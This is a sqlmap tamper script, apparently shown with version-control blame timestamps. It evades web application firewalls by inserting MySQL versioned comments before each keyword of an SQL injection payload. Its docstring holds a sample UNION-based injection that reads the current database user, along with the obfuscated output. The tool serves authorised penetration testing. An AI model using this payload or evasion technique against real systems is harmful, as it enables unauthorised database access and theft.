2019-03-21 16:00:09 +03:00
#!/usr/bin/env python2
2012-12-26 20:12:17 +04:00
"""
2019-01-05 23:38:52 +03:00
Copyright ( c ) 2006 - 2019 sqlmap developers ( http : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2012-12-26 20:12:17 +04:00
"""
import os
import re
from lib . core . common import singleTimeWarnMessage
from lib . core . data import kb
from lib . core . enums import DBMS
from lib . core . enums import PRIORITY
from lib . core . settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY . HIGHER
def dependencies ( ) :
singleTimeWarnMessage ( " tamper script ' %s ' is only meant to be run against %s < 5.1 " % ( os . path . basename ( __file__ ) . split ( " . " ) [ 0 ] , DBMS . MYSQL ) )
def tamper ( payload , * * kwargs ) :
"""
2018-07-31 02:17:11 +03:00
Adds ( MySQL ) versioned comment before each keyword
2012-12-26 20:12:17 +04:00
Requirement :
* MySQL < 5.1
Tested against :
* MySQL 4.0 .18 , 5.0 .22
Notes :
* Useful to bypass several web application firewalls when the
back - end database management system is MySQL
* Used during the ModSecurity SQL injection challenge ,
http : / / modsecurity . org / demo / challenge . html
2013-03-14 00:57:09 +04:00
>> > tamper ( " value ' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ' QDWa ' = ' QDWa " )
" value ' /*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND ' QDWa ' = ' QDWa "
2012-12-26 20:12:17 +04:00
"""
def process ( match ) :
word = match . group ( ' word ' )
if word . upper ( ) in kb . keywords and word . upper ( ) not in IGNORE_SPACE_AFFECTED_KEYWORDS :
return match . group ( ) . replace ( word , " /*!0 %s " % word )
else :
return match . group ( )
retVal = payload
if payload :
retVal = re . sub ( r " (?<= \ W)(?P<word>[A-Za-z_]+)(?= \ W| \ Z) " , lambda match : process ( match ) , retVal )
retVal = retVal . replace ( " /*!0 " , " /*!0 " )
return retVal